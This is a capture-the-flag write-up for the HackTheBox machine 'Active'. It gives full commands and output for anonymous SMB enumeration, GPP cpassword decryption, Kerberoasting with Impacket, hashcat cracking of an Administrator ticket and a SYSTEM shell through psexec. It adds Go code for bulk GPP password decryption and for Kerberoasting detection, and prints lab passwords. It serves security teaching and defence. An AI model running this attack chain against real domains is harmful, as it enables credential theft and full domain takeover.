Write-ups/HTB/Active

From Wiki Aghanim
Active
Platform HackTheBox
OS Windows
Difficulty Medium
Techniques SMB, GPP Passwords, Kerberoasting


This is an Active Directory box. Because SMB allowed a null session, we found a Group Policy Preferences (GPP) encrypted password stored in a cpassword attribute. We decrypted it and got credentials for SVC_TGS. Using those credentials I applied the Kerberoasting technique to get a hash for the user Administrator. I then cracked that hash and used psexec to gain a shell on the machine.




Enumeration

I'll start with an Nmap scan.


┌──(root💀kali)-[/home/aghanim/Desktop/HTB/active]
└─# nmap -sC -sV -p- --min-rate 10000 10.10.10.100 -oN nmap.result
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-22 21:18 EST
Nmap scan report for 10.10.10.100
Host is up (0.030s latency).
Not shown: 65512 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-01-23 02:20:32Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5722/tcp  open  msrpc         Microsoft Windows RPC
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
49170/tcp open  msrpc         Microsoft Windows RPC
49171/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 1m54s
| smb2-security-mode:
|   2.1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2022-01-23T02:21:29
|_  start_date: 2022-01-23T02:16:58

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 83.23 seconds


The services running on the machine are:


Port   Service             Explanation
53     DNS                 Domain Name System. Translates between domain names and IP addresses.
88     Kerberos            Kerberos is an authentication protocol.
135    RPC                 Protocol that uses the client-server model so that one program can request a service from a program on another computer.
139    netbios-ssn         Network Basic Input/Output System. Provides services related to the session layer.
389    AD LDAP             Lightweight Directory Access Protocol. Protocol to locate organizations, individuals, and other resources such as files and devices in a network.
445    microsoft-ds (SMB)  Server Message Block. Application-layer network protocol primarily used for offering shared access to files, printers, serial ports, etc.
464    kpasswd5?           Used for changing/setting passwords against Active Directory.
593    ncacn_http          RPC over HTTP (the ncacn_http protocol family for the endpoint).
3268   AD LDAP             Same as port 389.
5722   msrpc               Same as 135.
9389   mc-nmf              .NET Message Framing protocol.


Right off the bat we can note that the domain is active.htb.


I'll start with listing shares that are available in SMB.


┌──(root💀kali)-[/home/aghanim/Desktop/HTB/active]
└─# smbclient -L //10.10.10.100
Enter WORKGROUP\root's password:
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        Replication     Disk
        SYSVOL          Disk      Logon server share
        Users           Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.100 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available


Enumerating the Replication share I found an XML file called Groups.xml.


┌──(root💀kali)-[/home/aghanim/Desktop/HTB/active]
└─# cat Groups.xml


In that file we get a service user, SVC_TGS, and a Group Policy Preferences encrypted password. Microsoft published the AES key used for GPP encryption in its own documentation, so any cpassword value can be decrypted. Microsoft released a patch in 2014 that prevents admins from putting new passwords into GPP, but the patch does nothing about passwords that were already stored there.


Decrypting the GPP password

┌──(root💀kali)-[/home/aghanim/Desktop/HTB/active]
└─# gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18


So we have the credentials for the service account. SVC_TGS:GPPstillStandingStrong2k18.
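
To audit a whole SYSVOL for leftover GPP credentials rather than decrypt one value by hand, here is an added Go example (mine, not the box author's code and not gpp-decrypt itself) that parses a Groups.xml fragment and decrypts every cpassword with the AES key Microsoft published. The XML fragment is constructed: it uses the element and attribute names GPP writes, carrying the cpassword from this box; everything else in it is made up.

```go
package main
import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"encoding/base64"
	"encoding/xml"
	"fmt"
	"strings"
	"unicode/utf16"
)

// Fixed AES-256 key Microsoft documented in MS-GPPREF; every GPP cpassword is encrypted with it.
var gppKey = []byte{0x4e, 0x99, 0x06, 0xe8, 0xfc, 0xb6, 0x6c, 0xc9, 0xfa, 0xf4, 0x93, 0x10, 0x62, 0x0f, 0xfe, 0xe8, 0xf4, 0x96, 0xe8, 0x06, 0xcc, 0x05, 0x79, 0x90, 0x20, 0x9b, 0x09, 0xa4, 0x33, 0xb6, 0x6c, 0x1b}
// Constructed Groups.xml fragment: GPP's element and attribute names, carrying the cpassword from this box.
const SampleGroupsXML = `<Groups><User name="active.htb\SVC_TGS"><Properties action="U" userName="active.htb\SVC_TGS" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"/></User></Groups>`

type gppProps struct {
	UserName  string `xml:"userName,attr"`
	CPassword string `xml:"cpassword,attr"`
}
type gppGroups struct{ Users []gppProps `xml:"User>Properties"` }
// DecryptCPassword reverses the GPP scheme: re-pad the base64, AES-256-CBC with a zero IV, strip PKCS#7, decode UTF-16LE.
func DecryptCPassword(cpassword string) (string, error) {
	ct, err := base64.StdEncoding.DecodeString(cpassword + strings.Repeat("=", (4-len(cpassword)%4)%4))
	if err != nil || len(ct) == 0 || len(ct)%aes.BlockSize != 0 { return "", fmt.Errorf("cpassword is not base64 of whole AES blocks") }
	block, _ := aes.NewCipher(gppKey) // 32-byte key, so NewCipher cannot fail
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, make([]byte, aes.BlockSize)).CryptBlocks(pt, ct)
	pad := int(pt[len(pt)-1]) // valid PKCS#7 is 1..16 copies of the pad byte; anything else is not GPP data
	padOK := pad >= 1 && pad <= aes.BlockSize && bytes.Equal(pt[len(pt)-pad:], bytes.Repeat([]byte{byte(pad)}, pad))
	if !padOK { return "", fmt.Errorf("bad PKCS#7 padding: not a GPP cpassword") }
	u16 := make([]uint16, (len(pt)-pad)/2)
	for i := range u16 { u16[i] = uint16(pt[2*i]) | uint16(pt[2*i+1])<<8 } // little-endian code units
	return string(utf16.Decode(u16)), nil
}

// AuditGroupsXML maps each userName still carrying a cpassword to its plaintext: the stale GPP credentials left in SYSVOL.
func AuditGroupsXML(doc string) (map[string]string, error) {
	var g gppGroups
	if err := xml.Unmarshal([]byte(doc), &g); err != nil { return nil, err }
	found := map[string]string{}
	for _, u := range g.Users {
		if u.CPassword == "" { continue } // this entry never stored a password
		pw, err := DecryptCPassword(u.CPassword)
		if err != nil { return nil, fmt.Errorf("%s: %w", u.UserName, err) }
		found[u.UserName] = pw
	}
	return found, nil
}
```

Pointing AuditGroupsXML at each Groups.xml, Services.xml or ScheduledTasks.xml under \\domain\SYSVOL lists exactly which accounts still have a readable password sitting there.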


From the earlier enumeration, I saw the share called Users. The user SVC_TGS has access to that share.


smb: \SVC_TGS\> ls
  .                                   D        0  Sat Jul 21 11:16:32 2018
  ..                                  D        0  Sat Jul 21 11:16:32 2018
  Contacts                            D        0  Sat Jul 21 11:14:11 2018
  Desktop                             D        0  Sat Jul 21 11:14:42 2018
  Downloads                           D        0  Sat Jul 21 11:14:23 2018
  Favorites                           D        0  Sat Jul 21 11:14:44 2018
  Links                               D        0  Sat Jul 21 11:14:57 2018
  My Documents                        D        0  Sat Jul 21 11:15:03 2018
  My Music                            D        0  Sat Jul 21 11:15:32 2018
  My Pictures                         D        0  Sat Jul 21 11:15:43 2018
  My Videos                           D        0  Sat Jul 21 11:15:53 2018
  Saved Games                         D        0  Sat Jul 21 11:16:12 2018
  Searches                            D        0  Sat Jul 21 11:16:24 2018

                5217023 blocks of size 4096. 277681 blocks available
smb: \SVC_TGS\> cd Desktop\
smb: \SVC_TGS\Desktop\> ls
  .                                   D        0  Sat Jul 21 11:14:42 2018
  ..                                  D        0  Sat Jul 21 11:14:42 2018
  user.txt                           AR       34  Sat Jan 22 21:17:47 2022

                5217023 blocks of size 4096. 277681 blocks available
smb: \SVC_TGS\Desktop\> get user.txt
getting file \SVC_TGS\Desktop\user.txt of size 34 as user.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \SVC_TGS\Desktop\> exit


Root

To get the credentials for the Administrator account I'll use a technique called Kerberoasting.


> The goal of Kerberoasting is to harvest TGS tickets for services that run on behalf of user accounts in the AD, not computer accounts. Thus, part of these TGS tickets are encrypted with keys derived from user passwords. As a consequence, their credentials could be cracked offline. You can know that a user account is being used as a service because the property "ServicePrincipalName" is not null.
>
> Therefore, to perform Kerberoasting, only a domain account that can request TGSs is necessary, which is anyone since no special privileges are required. https://book.hacktricks.xyz/windows/active-directory-methodology/kerberoast


I'll use Impacket's GetUserSPNs. PentestLab has a great blog post about Service Principal Names.


┌──(root💀kali)-[/home/aghanim/Desktop/HTB/active]
└─# impacket-GetUserSPNs -request -dc-ip 10.10.10.100 active.htb/svc_tgs -outputfile hashes.kerberoast
Impacket v0.9.25.dev1+20220105.151306.10e53952 - Copyright 2021 SecureAuth Corporation

Password:
ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2022-01-22 21:18:00.883745


I'll now attempt to crack the hash using hashcat. Using hashcat on my host instead of the Kali VM allows me to use the GPU to crack the hash. Even though the hash is probably a password from rockyou, using hashcat with a GPU is a lot faster than using the CPU. GPU passthrough to a VM with a consumer card is a hassle, so I haven't done it.


C:\Users\AlaaG\OneDrive\Skrivebord\hashcat-6.2.4>hashcat -m 13100 --force -a 0 C:\Users\AlaaG\OneDrive\Skrivebord\hash.kerberoast.txt rockyou.txt
hashcat (v6.2.4) starting

====================
* Device #1: NVIDIA GeForce RTX 3070 Laptop GPU, 7150/8191 MB, 40MCU

OpenCL API (OpenCL 3.0 CUDA 11.5.125) - Platform #1 [NVIDIA Corporation]
========================================================================
* Device #2: NVIDIA GeForce RTX 3070 Laptop GPU, skipped

OpenCL API (OpenCL 2.1 AMD-APP (3224.5)) - Platform #2 [Advanced Micro Devices, Inc.]
=====================================================================================
* Device #3: AMD Radeon(TM) Graphics, 6624/13320 MB (4790 MB allocatable), 8MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 421 MB

Dictionary cache built:
* Filename..: rockyou.txt
* Passwords.: 14344391
* Bytes.....: 139921497
* Keyspace..: 14344384
* Runtime...: 0 secs

$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$037f289324d5c77c9f1847bf3606e6c6$d1462adf2fb2dd4f89fe5b86993cf73a78103bcdf3d72e5fd629c77005eb512d9bc3ca959e7efba7041b7dae4662f058845ee19e91db9fcb479d671cd60663c69df89e33bff176d803e1cae39378521d208e54df913b8c22cd59f884624626234dadc6aa0f9e6550a583553e78944d017ea871fb966c98d99e2eda0889199407bd462d5f9fae457d8dd5a0b2e686d471fdfe78f94878a0e7e0b5d869b4b17e8539248dd2d86a783064fbb959495de4cb8fd8d9c03fa1f51f4ce8bbd3dc994629823c9ebc3eab68849b05988dc025341eb03869744b193b192e0daffd0b88789b3692300870dc88fe7a08bd3dc86a46151499f90e14836bc2f8f11b93544668356fbdac21b04a0db6d8dedcadb26e03546c65c4ad458d1976996f1ab95390ab298fc0209142747b7ec436d9117cbbd07917ef3b7d864374d936d40b9f16a2716fc075c8000ee8cd8343ce78093f2a6f59175ced3be477df0e2a9624c7bc9838d24909bf7e9bedee33a8361f205a0a5fa6821e5049f4eeee7c65bac97300097e865d086fb241b3180c3cf56d9b3e922e74b499bd5f0a392a2ebdc346bf66e7ff18819243726a4ca926623598e0d7b30be58dcdc972a6143a8591beb22772c506249691be84d0a035194404d560f304cfa636cadb921f06f80747beb82f2f67c9edf37652ad23412e658c7944d72e74cd3994ca40ba454e4a6883ad96d0bcd76c0ec284288fffd7d77ae5c164905915d31fe469a11464154e85bd5bf57592cf49691cf8935d93e65c049821b2272e2352d374ae7c61b7d181af37dc841b8008f5acb79a90270b298fdbbae92a3f11004f4cf5917751820089a9ad99ac607b139cbd0ccb6188ad7fa913fe8b732bc525c34dfbd44b7e27e5aa17da80e635f4f150024489c6ad225144218de4629d9caadf462897c551d6fbbccf53265cb09af16ade88b7ffc323f4861345a459a32531540c0d12ea080ec1ba284a61ad394d7eacee26ddb2317b299c97604905844ef9f499b7263714f324ed7d2fc5328af703968c5f07a08dbd4da65051e887723124d2ca7f1156e9bf04a738fe763069b842f53e7a53206295103a069c4452d071b040908c18ad167842f0dfe48527ac7d7d80a0060fe361d9947b06ba736ec87b87f919536ed2a3cf398f6b3d0a9b45fb50c345b4995dc746ad0746360cbb5ff593800a82f226f1d05fc41fbd2ee10cb18b85702a3580d012a113ab89eb37da7ac85053448fdfc81d8f0c8b495c:Ticketmaster1968

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Ad...8b495c
Time.Started.....: Sun Jan 23 20:22:15 2022, (2 secs)
Time.Estimated...: Sun Jan 23 20:22:17 2022, (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 3187.8 kH/s (1.07ms) @ Accel:128 Loops:1 Thr:32 Vec:1
Speed.#3.........: 2506.8 kH/s (8.84ms) @ Accel:256 Loops:1 Thr:32 Vec:1
Speed.#*.........: 5694.6 kH/s
Recovered........: 1/1 (100.00%) Digests
Progress.........: 10616832/14344384 (74.01%)
Rejected.........: 0/10616832 (0.00%)
Restore.Point....: 10190848/14344384 (71.04%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Restore.Sub.#3...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: ace14325 -> TUGGAB8
Candidates.#3....: TUGGA00 -> Sabo2008
Hardware.Mon.#1..: Temp: 40c Util: 6% Core:1559MHz Mem:6994MHz Bus:8
Hardware.Mon.#3..: Util: 39% Core:2000MHz Mem:1600MHz Bus:16

Started: Sun Jan 23 20:21:41 2022
Stopped: Sun Jan 23 20:22:18 2022
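
On the defending side, the GetUserSPNs request above shows up on the domain controller as Security event 4769 with TicketEncryptionType 0x17 (RC4), the etype 23 that hashcat mode 13100 cracks. The added Go example below (mine, not the author's or Impacket's) classifies constructed 4769 records and flags an account that pulls RC4 tickets for several user SPNs within one window; it generalises past this box, where only the Administrator SPN existed, so the sqlsvc service and the jdoe account are made up.

```go
package main
import (
	"strings"
	"time"
)

// Minimal view of Security event 4769 (a Kerberos service ticket was requested).
type TGSRequest struct {
	When             time.Time
	Account, Service string // TargetUserName (who asked) and ServiceName (the account owning the SPN)
	EType, Status    int    // TicketEncryptionType: 0x17 RC4-HMAC, 0x12 AES256; Status 0x0 = ticket issued
}

func at(s string) time.Time { ts, _ := time.Parse(time.RFC3339, s); return ts }
// Constructed sample events modelled on the GetUserSPNs run above (svc_tgs pulling an RC4 ticket
// for the Administrator SPN) plus made-up traffic; sqlsvc and jdoe do not exist on the box.
var SampleEvents = []TGSRequest{
	{at("2022-01-23T02:18:00Z"), "svc_tgs", "DC$", 0x12, 0},           // computer account: never roastable
	{at("2022-01-23T02:18:01Z"), "svc_tgs", "Administrator", 0x17, 0}, // the ticket hashcat 13100 cracked
	{at("2022-01-23T02:18:01Z"), "svc_tgs", "sqlsvc", 0x17, 0},        // a second SPN in the same sweep
	{at("2022-01-23T02:18:02Z"), "svc_tgs", "krbtgt", 0x17, 0},        // krbtgt ticket: excluded
	{at("2022-01-23T09:00:00Z"), "jdoe", "sqlsvc", 0x12, 0},           // AES ticket: not what 13100 cracks
	{at("2022-01-23T13:00:00Z"), "jdoe", "Administrator", 0x17, 0x7},  // non-zero status: no ticket issued
}

// IsRoastable: an issued RC4 ticket for a user account's SPN is exactly the $krb5tgs$23$ blob that
// hashcat mode 13100 cracks; krbtgt and computer ($) accounts have random keys, not password-derived ones.
func IsRoastable(e TGSRequest) bool {
	svc := strings.ToLower(e.Service)
	return e.Status == 0 && e.EType == 0x17 && svc != "krbtgt" && !strings.HasSuffix(svc, "$")
}

// PeakSPNsPerAccount returns, per requesting account, the most distinct user SPNs it obtained roastable
// tickets for inside any one window. Many SPNs in a burst is the shape of a GetUserSPNs -request run;
// a lone RC4 ticket may just be one legacy service, so the caller picks the alert threshold.
func PeakSPNsPerAccount(events []TGSRequest, window time.Duration) map[string]int {
	type run struct { first time.Time; svcs map[string]bool }
	runs, peak := map[string]*run{}, map[string]int{}
	for _, e := range events { // assumed time-ordered, as an exported event log is
		if !IsRoastable(e) { continue }
		r := runs[e.Account]
		if r == nil || e.When.Sub(r.first) > window { // start a new window for this account
			r = &run{e.When, map[string]bool{}}
			runs[e.Account] = r
		}
		r.svcs[strings.ToLower(e.Service)] = true
		if len(r.svcs) > peak[e.Account] { peak[e.Account] = len(r.svcs) }
	}
	return peak
}
```

The durable fix is the one the event type points at: long random passwords for accounts that carry an SPN (or gMSAs), and AES-only Kerberos so no etype 23 ticket is ever issued.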


We now have the credentials for the Administrator account, Administrator:Ticketmaster1968. I can now fetch root.txt from the SMB share.


┌──(root💀kali)-[/home/aghanim/Desktop/HTB/active]
└─# smbclient //10.10.10.100/Users -U "active.htb\Administrator"
Enter ACTIVE.HTB\Administrator's password:
Try "help" to get a list of possible commands.
smb: \Administrator\Desktop\> ls
  .                                  DR        0  Thu Jan 21 11:49:47 2021
  ..                                 DR        0  Thu Jan 21 11:49:47 2021
  desktop.ini                       AHS      282  Mon Jul 30 09:50:10 2018
  root.txt                           AR       34  Sat Jan 22 21:17:47 2022

                5217023 blocks of size 4096. 277665 blocks available
smb: \Administrator\Desktop\> get root.txt
getting file \Administrator\Desktop\root.txt of size 34 as root.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)


Shell

To get a shell on the machine I'll use Impacket's psexec.


┌──(root💀kali)-[/home/aghanim/Desktop/HTB/active]
└─# impacket-psexec active.htb/Administrator@10.10.10.100
Impacket v0.9.25.dev1+20220105.151306.10e53952 - Copyright 2021 SecureAuth Corporation

Password:
[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file eUvcjiEp.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service DzMt on 10.10.10.100.....
[*] Starting service DzMt.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32>


What I've learned

  • Before 2014, AD environments could have GPP-encrypted passwords "hidden" in a file.
  • When pentesting an Active Directory environment there may be many ports open. Enumerating the low-hanging fruit first is key, so as not to get lost or spend a huge amount of time enumerating services that might not have anything useful. That does not, however, mean you should not enumerate thoroughly.